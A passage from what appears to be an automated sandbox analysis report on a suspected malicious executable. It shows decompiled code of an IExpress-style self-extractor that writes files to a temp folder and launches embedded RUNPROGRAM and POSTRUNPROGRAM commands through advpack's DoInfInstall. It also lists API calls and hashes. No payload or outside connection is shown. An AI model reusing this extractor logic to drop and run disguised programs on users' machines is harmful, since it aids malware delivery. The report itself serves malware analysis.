				void* _t33;
				struct HWND__* _t34;
				signed int _t35;

				_t33 = __edi;
				_t27 = __ebx;
				_t11 =  *0x408004; // 0xee8c6708
				_v8 = _t11 ^ _t35;
				_t34 = _a4;
				_t14 = _a8 - 0x110;
				if(_t14 == 0) {
					_t32 = GetDesktopWindow();
					E004043D0(_t34, _t15);
					_v520 = 0;
					LoadStringA( *0x409a3c, _a16,  &_v520, 0x200);
					SetDlgItemTextA(_t34, 0x83f,  &_v520);
					MessageBeep(0xffffffff);
					goto L6;
				} else {
					if(_t14 != 1) {
						L4:
						_t23 = 0;
					} else {
						_t32 = _a12;
						if(_t32 - 0x83d > 1) {
							goto L4;
						} else {
							EndDialog(_t34, _t32);
							L6:
							_t23 = 1;
						}
					}
				}
				return E00406CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x004019e0
0x004019e0
0x004019eb
0x004019f2
0x004019f9
0x004019fc
0x00401a01
0x00401a2a
0x00401a2e
0x00401a3e
0x00401a4f
0x00401a62
0x00401a6a
0x00000000
0x00401a03
0x00401a06
0x00401a20
0x00401a20
0x00401a08
0x00401a08
0x00401a14
0x00000000
0x00401a16
0x00401a18
0x00401a70
0x00401a72
0x00401a72
0x00401a14
0x00401a06
0x00401a81

APIs

EndDialog.USER32(?,?), ref: 00401A18
GetDesktopWindow.USER32 ref: 00401A24
LoadStringA.USER32(?,?,00000200), ref: 00401A4F
SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00401A62
MessageBeep.USER32(000000FF), ref: 00401A6A

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
String ID:
API String ID: 1273765764-0
Opcode ID: d9743750891ecfc6e9dee04f25138df3a5583d44e806c7f1623634d903d62883
Instruction ID: 9f07e2b583c3b9e3b689e24bd258bcd44b67705ed80a1d215512c7b4a79a90b1
Opcode Fuzzy Hash: d9743750891ecfc6e9dee04f25138df3a5583d44e806c7f1623634d903d62883
Instruction Fuzzy Hash: 381152316012199BDB10EF68DE08AAE77B8EB49310F108175F916B61E1DA349E11DF99

Uniqueness

Uniqueness Score: -1.00%

Function 004063C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E004063C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
				signed int _v8;
				char _v268;
				long _v272;
				void* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				long _t28;
				struct _OVERLAPPED* _t37;
				void* _t39;
				signed int _t40;

				_t15 =  *0x408004; // 0xee8c6708
				_v8 = _t15 ^ _t40;
				_v272 = _v272 & 0x00000000;
				_push(__ecx);
				_v276 = _a16;
				_t37 = 1;
				E00401781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
				E0040658A( &_v268, 0x104, _a12);
				_t28 = 0;
				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t39 != 0xffffffff) {
					_t28 = _a4;
					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
						 *0x409124 = 0x80070052;
						_t37 = 0;
					}
					CloseHandle(_t39);
				} else {
					 *0x409124 = 0x80070052;
					_t37 = 0;
				}
				return E00406CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
			}

0x004063cb
0x004063d2
0x004063d8
0x004063ea
0x004063f3
0x00406401
0x00406402
0x00406410
0x00406415
0x00406433
0x00406438
0x00406449
0x00406463
0x0040646d
0x00406477
0x00406477
0x0040647a
0x0040643a
0x0040643a
0x00406444
0x00406444
0x00406492

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0040642D
WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0040645B
CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0040647A

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 004063EB

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 1065093856-2312194364
Opcode ID: 1d08131b8de5a93f00fc779c4fb946ff78967df0c99f5913713becff4f1b13ca
Instruction ID: 9e5926c835beb8d1d737b027b25a5559d0e4d4e7e399f98f9f62a26a88332679
Opcode Fuzzy Hash: 1d08131b8de5a93f00fc779c4fb946ff78967df0c99f5913713becff4f1b13ca
Instruction Fuzzy Hash: FF21C071A0021CAFDB10DF25DC85FEB7368EB44314F1041BAB985B7290DAB45D958FAC

Uniqueness

Uniqueness Score: -1.00%

Function 004047E0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004047E0(intOrPtr* __ecx) {
				intOrPtr _t6;
				intOrPtr _t9;
				void* _t11;
				void* _t19;
				intOrPtr* _t22;
				void _t24;
				struct HWND__* _t25;
				struct HWND__* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t33;
				void* _t34;

				_t33 = __ecx;
				_t34 = LocalAlloc(0x40, 8);
				if(_t34 != 0) {
					_t22 = _t33;
					_t27 = _t22 + 1;
					do {
						_t6 =  *_t22;
						_t22 = _t22 + 1;
					} while (_t6 != 0);
					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
					 *_t34 = _t24;
					if(_t24 != 0) {
						_t28 = _t33;
						_t19 = _t28 + 1;
						do {
							_t9 =  *_t28;
							_t28 = _t28 + 1;
						} while (_t9 != 0);
						E00401680(_t24, _t28 - _t19 + 1, _t33);
						_t11 =  *0x4091e0; // 0x4eed580
						 *(_t34 + 4) = _t11;
						 *0x4091e0 = _t34;
						return 1;
					}
					_t25 =  *0x408584; // 0x0
					E004044B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
					LocalFree(_t34);
					L2:
					return 0;
				}
				_t26 =  *0x408584; // 0x0
				E004044B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
				goto L2;
			}

0x004047e8
0x004047f0
0x004047f4
0x0040480f
0x00404811
0x00404814
0x00404814
0x00404816
0x00404817
0x00404829
0x0040482b
0x0040482f
0x0040484f
0x00404852
0x00404855
0x00404855
0x00404857
0x00404858
0x00404860
0x00404865
0x0040486a
0x0040486f
0x00000000
0x00404876
0x00404831
0x00404841
0x00404847
0x0040480b
0x00000000
0x0040480b
0x004047f6
0x00404806
0x00000000

APIs

LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00404E6F), ref: 004047EA
LocalAlloc.KERNEL32(00000040,?), ref: 00404823
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00404847

Part of subcall function 004044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
Part of subcall function 004044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00404851

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: Local$Alloc$FreeLoadMessageString
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 359063898-2312194364
Opcode ID: 8869d0824eb19464cae7da9100bae2d8cc37a5c0b10d5c67c72c21a849d46169
Instruction ID: f9da94a783bc0005b1bc8c3148c785d844e837b74aa1f48265ffd0ddb08f4ce8
Opcode Fuzzy Hash: 8869d0824eb19464cae7da9100bae2d8cc37a5c0b10d5c67c72c21a849d46169
Instruction Fuzzy Hash: C311A7B9604641AFD714AF249D18F773759E7C5300B04893AEB82BB381DA799C068668

Uniqueness

Uniqueness Score: -1.00%

Function 00403680 Relevance: 6.1, APIs: 4, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403680(void* __ecx) {
				void* _v8;
				struct tagMSG _v36;
				int _t8;
				struct HWND__* _t16;

				_v8 = __ecx;
				_t16 = 0;
				while(1) {
					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
					if(_t8 == 0) {
						break;
					}
					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
						continue;
					} else {
						do {
							if(_v36.message != 0x12) {
								DispatchMessageA( &_v36);
							} else {
								_t16 = 1;
							}
							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
						} while (_t8 != 0);
						if(_t16 == 0) {
							continue;
						}
					}
					break;
				}
				return _t8;
			}

0x0040368c
0x0040368f
0x00403691
0x0040369f
0x004036a7
0x00000000
0x00000000
0x004036ba
0x00000000
0x004036bc
0x004036bc
0x004036c0
0x004036cb
0x004036c2
0x004036c4
0x004036c4
0x004036da
0x004036e0
0x004036e6
0x00000000
0x00000000
0x004036e6
0x00000000
0x004036ba
0x004036ed

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0040369F
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004036B2
DispatchMessageA.USER32(?), ref: 004036CB
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004036DA

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: Message$Peek$DispatchMultipleObjectsWait
String ID:
API String ID: 2776232527-0
Opcode ID: 001db7e1ce09ae2bdadfcd650bd5b9b259c25642c0b251ba00b0c79510ce8a6d
Instruction ID: f05eb470e6dbefdbdbfe8bdb1bf4a5152229d967e769d6720ff509b3f6c8b066
Opcode Fuzzy Hash: 001db7e1ce09ae2bdadfcd650bd5b9b259c25642c0b251ba00b0c79510ce8a6d
Instruction Fuzzy Hash: E701847290021977DB304AA65C48EEB7A7CEB86B11F04013AB905F62C0D5758654C6A9

Uniqueness

Uniqueness Score: -1.00%

Function 004065E8 Relevance: 6.0, APIs: 4, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E004065E8(char* __ecx) {
				char _t3;
				char _t10;
				char* _t12;
				char* _t14;
				char* _t15;
				CHAR* _t16;

				_t12 = __ecx;
				_t15 = __ecx;
				_t14 =  &(__ecx[1]);
				_t10 = 0;
				do {
					_t3 =  *_t12;
					_t12 =  &(_t12[1]);
				} while (_t3 != 0);
				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
				while(1) {
					_t16 = CharPrevA(_t15, ??);
					if(_t16 <= _t15) {
						break;
					}
					if( *_t16 == 0x5c) {
						L7:
						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
							_t16 = CharNextA(_t16);
						}
						 *_t16 = _t10;
						_t10 = 1;
					} else {
						_push(_t16);
						continue;
					}
					L11:
					return _t10;
				}
				if( *_t16 == 0x5c) {
					goto L7;
				}
				goto L11;
			}

0x004065e8
0x004065ed
0x004065ef
0x004065f2
0x004065f4
0x004065f4
0x004065f6
0x004065f7
0x00406608
0x00406611
0x00406618
0x0040661c
0x00000000
0x00000000
0x0040660e
0x00406623
0x00406625
0x0040663b
0x0040663b
0x0040663d
0x00406641
0x00406610
0x00406610
0x00000000
0x00406610
0x00406644
0x00406647
0x00406647
0x00406621
0x00000000
0x00000000
0x00000000

APIs

CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00402B33), ref: 00406602
CharPrevA.USER32(?,00000000), ref: 00406612
CharPrevA.USER32(?,00000000), ref: 00406629
CharNextA.USER32(00000000), ref: 00406635

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: Char$Prev$Next
String ID:
API String ID: 3260447230-0
Opcode ID: 828796b4383d088e17d1056b3097c8ba1f0d67e732c974cb9d04120152cf1a4e
Instruction ID: 90baad459b50eabb1a16afa7fd56dffec2b03aec054ee39de7a83aca56c67232
Opcode Fuzzy Hash: 828796b4383d088e17d1056b3097c8ba1f0d67e732c974cb9d04120152cf1a4e
Instruction Fuzzy Hash: BCF02D310045506EE7325B285C888B7BF9CCF87354B1B057FE493B6241DA3E0D168669

Uniqueness

Uniqueness Score: -1.00%

Function 004069B0 Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004069B0() {
				intOrPtr* _t4;
				intOrPtr* _t5;
				void* _t6;
				intOrPtr _t11;
				intOrPtr _t12;

				 *0x4081f8 = E00406C70();
				__set_app_type(E00406FBE(2));
				 *0x4088a4 =  *0x4088a4 | 0xffffffff;
				 *0x4088a8 =  *0x4088a8 | 0xffffffff;
				_t4 = __p__fmode();
				_t11 =  *0x408528; // 0x0
				 *_t4 = _t11;
				_t5 = __p__commode();
				_t12 =  *0x40851c; // 0x0
				 *_t5 = _t12;
				_t6 = E00407000();
				if( *0x408000 == 0) {
					__setusermatherr(E00407000);
				}
				E004071EF(_t6);
				return 0;
			}

0x004069b7
0x004069c2
0x004069c8
0x004069cf
0x004069d8
0x004069de
0x004069e4
0x004069e6
0x004069ec
0x004069f2
0x004069f4
0x00406a00
0x00406a07
0x00406a0d
0x00406a0e
0x00406a15

APIs

Part of subcall function 00406FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00406FC5

__set_app_type.MSVCRT ref: 004069C2
__p__fmode.MSVCRT ref: 004069D8
__p__commode.MSVCRT ref: 004069E6
__setusermatherr.MSVCRT ref: 00406A07

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
String ID:
API String ID: 1632413811-0
Opcode ID: 5c327bfb5f8620ce66be7007ffc2ded83395ae1433e947bc734a25fcd952183d
Instruction ID: 6ac6555f9eb226a1f7bfa0f854930428727c3ad6fe2539b3037ce5b820c07743
Opcode Fuzzy Hash: 5c327bfb5f8620ce66be7007ffc2ded83395ae1433e947bc734a25fcd952183d
Instruction Fuzzy Hash: 8EF0F8705083019FD714BB30AF0A7083B61FB05329B11467EE4A2B63E1CF3E95618A1D

Uniqueness

Uniqueness Score: -1.00%

Function 00406952 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406952(CHAR* __ecx) {
				long _v8;
				long _v12;
				long _v16;
				char _v20;
				int _t22;

				_t22 = 0;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if( *__ecx != 0) {
					_t6 =  &_v20; // 0x405760
					if(GetDiskFreeSpaceA(__ecx,  &_v12,  &_v8, _t6,  &_v16) != 0) {
						_t22 = MulDiv(_v8 * _v12, _v16, 0x400);
					}
				}
				return _t22;
			}

0x0040695b
0x00406960
0x00406963
0x00406966
0x00406969
0x0040696c
0x00406972
0x00406987
0x0040699f
0x0040699f
0x00406987
0x004069a7

APIs

GetDiskFreeSpaceA.KERNEL32(0000005A,?,?,`W@,?,00000000,00405760,?,A:\), ref: 0040697F
MulDiv.KERNEL32(?,?,00000400), ref: 00406999

Strings

`W@, xrefs: 00406972, 00406975

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: DiskFreeSpace
String ID: `W@
API String ID: 1705453755-883988529
Opcode ID: 4554a972362b579aece8da8bb716027f856847a3e88e224d63c11008acf42226
Instruction ID: 1c7512448c6eccd8852a64e065144c261afeb287fd377f30d938299290270787
Opcode Fuzzy Hash: 4554a972362b579aece8da8bb716027f856847a3e88e224d63c11008acf42226
Instruction Fuzzy Hash: FCF0E7B6D00228BBCB11DFE88944ADEBBBCEB48700F1041A6A511F6240D6759A108BD5

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: kino5628.exePID: 6084, Parent PID: 6092COMMON

Execution Graph

Execution Coverage:	28.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	960
Total number of Limit Nodes:	25

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 008E3BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308
libraryloaderCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E008E3BA2() {
				signed int _v8;
				signed int _v12;
				char _v276;
				char _v280;
				short _v300;
				intOrPtr _v304;
				void _v348;
				char _v352;
				intOrPtr _v356;
				signed int _v360;
				short _v364;
				char* _v368;
				intOrPtr _v372;
				void* _v376;
				intOrPtr _v380;
				char _v384;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				void* _v408;
				void* _v424;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t69;
				signed int _t76;
				void* _t77;
				signed int _t79;
				short _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				int _t112;
				void* _t115;
				signed char _t118;
				void* _t125;
				signed int _t127;
				void* _t128;
				struct HINSTANCE__* _t129;
				void* _t130;
				short _t137;
				char* _t140;
				signed char _t144;
				signed char _t145;
				signed int _t149;
				void* _t150;
				void* _t151;
				signed int _t153;
				void* _t155;
				void* _t156;
				signed int _t157;
				signed int _t162;
				signed int _t164;
				void* _t165;

				_t164 = (_t162 & 0xfffffff8) - 0x194;
				_t69 =  *0x8e8004; // 0xaf179a30
				_v8 = _t69 ^ _t164;
				_t153 = 0;
				 *0x8e9124 =  *0x8e9124 & 0;
				_t149 = 0;
				_v388 = 0;
				_v384 = 0;
				_t165 =  *0x8e8a28 - _t153; // 0x0
				if(_t165 != 0) {
					L3:
					_t127 = 0;
					_v392 = 0;
					while(1) {
						_v400 = _v400 & 0x00000000;
						memset( &_v348, 0, 0x44);
						_t164 = _t164 + 0xc;
						_v348 = 0x44;
						if( *0x8e8c42 != 0) {
							goto L26;
						}
						_t146 =  &_v396;
						_t115 = E008E468F("SHOWWINDOW",  &_v396, 4);
						if(_t115 == 0 || _t115 > 4) {
							L25:
							_t146 = 0x4b1;
							E008E44B9(0, 0x4b1, 0, 0, 0x10, 0);
							 *0x8e9124 = 0x80070714;
							goto L62;
						} else {
							if(_v396 != 1) {
								__eflags = _v396 - 2;
								if(_v396 != 2) {
									_t137 = 3;
									__eflags = _v396 - _t137;
									if(_v396 == _t137) {
										_v304 = 1;
										_v300 = _t137;
									}
									goto L14;
								}
								_push(6);
								_v304 = 1;
								_pop(0);
								goto L11;
							} else {
								_v304 = 1;
								L11:
								_v300 = 0;
								L14:
								if(_t127 != 0) {
									L27:
									_t155 = 1;
									__eflags = _t127 - 1;
									if(_t127 != 1) {
										L31:
										_t132 =  &_v280;
										_t76 = E008E1AE8( &_v280,  &_v408,  &_v404); // executed
										__eflags = _t76;
										if(_t76 == 0) {
											L62:
											_t77 = 0;
											L63:
											_pop(_t150);
											_pop(_t156);
											_pop(_t128);
											return E008E6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
										}
										_t157 = _v404;
										__eflags = _t149;
										if(_t149 != 0) {
											L37:
											__eflags = _t157;
											if(_t157 == 0) {
												L57:
												_t151 = _v408;
												_t146 =  &_v352;
												_t130 = _t151; // executed
												_t79 = E008E3FEF(_t130,  &_v352); // executed
												__eflags = _t79;
												if(_t79 == 0) {
													L61:
													LocalFree(_t151);
													goto L62;
												}
												L58:
												LocalFree(_t151);
												_t127 = _t127 + 1;
												_v396 = _t127;
												__eflags = _t127 - 2;
												if(_t127 >= 2) {
													_t155 = 1;
													__eflags = 1;
													L69:
													__eflags =  *0x8e8580;
													if( *0x8e8580 != 0) {
														E008E2267();
													}
													_t77 = _t155;
													goto L63;
												}
												_t153 = _v392;
												_t149 = _v388;
												continue;
											}
											L38:
											__eflags =  *0x8e8180;
											if( *0x8e8180 == 0) {
												_t146 = 0x4c7;
												E008E44B9(0, 0x4c7, 0, 0, 0x10, 0);
												LocalFree(_v424);
												 *0x8e9124 = 0x8007042b;
												goto L62;
											}
											__eflags = _t157;
											if(_t157 == 0) {
												goto L57;
											}
											__eflags =  *0x8e9a34 & 0x00000004;
											if(__eflags == 0) {
												goto L57;
											}
											_t129 = E008E6495(_t127, _t132, _t157, __eflags);
											__eflags = _t129;
											if(_t129 == 0) {
												_t146 = 0x4c8;
												E008E44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L65:
												LocalFree(_v408);
												 *0x8e9124 = E008E6285();
												goto L62;
											}
											_t146 = GetProcAddress(_t129, "DoInfInstall");
											_v404 = _t146;
											__eflags = _t146;
											if(_t146 == 0) {
												_t146 = 0x4c9;
												__eflags = 0;
												E008E44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
												FreeLibrary(_t129);
												goto L65;
											}
											__eflags =  *0x8e8a30;
											_t151 = _v408;
											_v384 = 0;
											_v368 =  &_v280;
											_t96 =  *0x8e9a40; // 0x3
											_v364 = _t96;
											_t97 =  *0x8e8a38 & 0x0000ffff;
											_v380 = 0x8e9154;
											_v376 = _t151;
											_v372 = 0x8e91e4;
											_v360 = _t97;
											if( *0x8e8a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0x8e9a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0x8e8d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0x8e9a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0x8ea288( &_v384);
											_t101 = _v404();
											__eflags = _t164 - _t164;
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29");
											}
											 *0x8e9124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0x8e9a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0x8e8a20;
										if( *0x8e8a20 == 0) {
											goto L37;
										}
										__eflags = _t157;
										if(_t157 != 0) {
											goto L38;
										}
										_v388 = 1;
										E008E202A(_t146); // executed
										goto L37;
									}
									_t146 =  &_v280;
									_t108 = E008E468F("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t108;
									if(_t108 == 0) {
										goto L25;
									}
									__eflags =  *0x8e8c42;
									if( *0x8e8c42 != 0) {
										goto L69;
									}
									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t112 == 0;
									if(_t112 == 0) {
										goto L69;
									}
									goto L31;
								}
								_t118 =  *0x8e8a38; // 0x0
								if(_t118 == 0) {
									L23:
									if(_t153 != 0) {
										goto L31;
									}
									_t146 =  &_v276;
									if(E008E468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
										goto L27;
									}
									goto L25;
								}
								if((_t118 & 0x00000001) == 0) {
									__eflags = _t118 & 0x00000002;
									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E008E468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
									}
									goto L23;
								}
								_t140 = "ADMQCMD";
								goto L20;
							}
						}
						L26:
						_push(_t130);
						_t146 = 0x104;
						E008E1781( &_v276, 0x104, _t130, 0x8e8c42);
						goto L27;
					}
				}
				_t130 = "REBOOT";
				_t125 = E008E468F(_t130, 0x8e9a2c, 4);
				if(_t125 == 0 || _t125 > 4) {
					goto L25;
				} else {
					goto L3;
				}
			}

0x008e3baa
0x008e3bb0
0x008e3bb7
0x008e3bc0
0x008e3bc2
0x008e3bc9
0x008e3bcb
0x008e3bcf
0x008e3bd3
0x008e3bd9
0x008e3bfd
0x008e3bfd
0x008e3bff
0x008e3c03
0x008e3c03
0x008e3c11
0x008e3c16
0x008e3c19
0x008e3c28
0x00000000
0x00000000
0x008e3c30
0x008e3c39
0x008e3c40
0x008e3d13
0x008e3d15
0x008e3d21
0x008e3d26
0x00000000
0x008e3c4f
0x008e3c56
0x008e3c60
0x008e3c65
0x008e3c77
0x008e3c78
0x008e3c7c
0x008e3c7e
0x008e3c82
0x008e3c82
0x00000000
0x008e3c7c
0x008e3c67
0x008e3c69
0x008e3c6d
0x00000000
0x008e3c58
0x008e3c58
0x008e3c6e
0x008e3c6e
0x008e3c87
0x008e3c89
0x008e3d4d
0x008e3d4f
0x008e3d50
0x008e3d52
0x008e3d9e
0x008e3da8
0x008e3daf
0x008e3db4
0x008e3db6
0x008e3f4d
0x008e3f4d
0x008e3f4f
0x008e3f56
0x008e3f57
0x008e3f58
0x008e3f63
0x008e3f63
0x008e3dbc
0x008e3dc0
0x008e3dc2
0x008e3de6
0x008e3de6
0x008e3de8
0x008e3f0b
0x008e3f0b
0x008e3f0f
0x008e3f13
0x008e3f15
0x008e3f1a
0x008e3f1c
0x008e3f46
0x008e3f47
0x00000000
0x008e3f47
0x008e3f1e
0x008e3f1f
0x008e3f25
0x008e3f26
0x008e3f2a
0x008e3f2d
0x008e3fd9
0x008e3fd9
0x008e3fda
0x008e3fda
0x008e3fe1
0x008e3fe3
0x008e3fe3
0x008e3fe8
0x00000000
0x008e3fe8
0x008e3f33
0x008e3f37
0x00000000
0x008e3f37
0x008e3dee
0x008e3dee
0x008e3df5
0x008e3fad
0x008e3fb9
0x008e3fc2
0x008e3fc8
0x00000000
0x008e3fc8
0x008e3dfb
0x008e3dfd
0x00000000
0x00000000
0x008e3e03
0x008e3e0a
0x00000000
0x00000000
0x008e3e15
0x008e3e17
0x008e3e19
0x008e3f94
0x008e3fa4
0x008e3f7c
0x008e3f80
0x008e3f8b
0x00000000
0x008e3f8b
0x008e3e2c
0x008e3e30
0x008e3e34
0x008e3e36
0x008e3f69
0x008e3f6e
0x008e3f70
0x008e3f76
0x00000000
0x008e3f76
0x008e3e3c
0x008e3e43
0x008e3e47
0x008e3e52
0x008e3e56
0x008e3e5c
0x008e3e61
0x008e3e68
0x008e3e70
0x008e3e74
0x008e3e7c
0x008e3e80
0x008e3e82
0x008e3e82
0x008e3e87
0x008e3e87
0x008e3e8b
0x008e3e91
0x008e3e94
0x008e3e96
0x008e3e96
0x008e3e9b
0x008e3e9b
0x008e3e9f
0x008e3ea2
0x008e3ea4
0x008e3ea4
0x008e3ea9
0x008e3ea9
0x008e3ead
0x008e3eb3
0x008e3eb6
0x008e3eb8
0x008e3eb8
0x008e3ebd
0x008e3ebd
0x008e3ec1
0x008e3ec3
0x008e3ec5
0x008e3ec5
0x008e3eca
0x008e3eca
0x008e3ece
0x008e3ed5
0x008e3ed9
0x008e3ee0
0x008e3ee6
0x008e3eea
0x008e3eec
0x008e3eee
0x008e3ef3
0x008e3ef3
0x008e3ef5
0x008e3efa
0x008e3efb
0x008e3efd
0x008e3f40
0x00000000
0x008e3eff
0x008e3eff
0x008e3f05
0x00000000
0x008e3f05
0x008e3efd
0x008e3dc7
0x008e3dce
0x00000000
0x00000000
0x008e3dd0
0x008e3dd7
0x00000000
0x00000000
0x008e3dd9
0x008e3ddb
0x00000000
0x00000000
0x008e3ddd
0x008e3de1
0x00000000
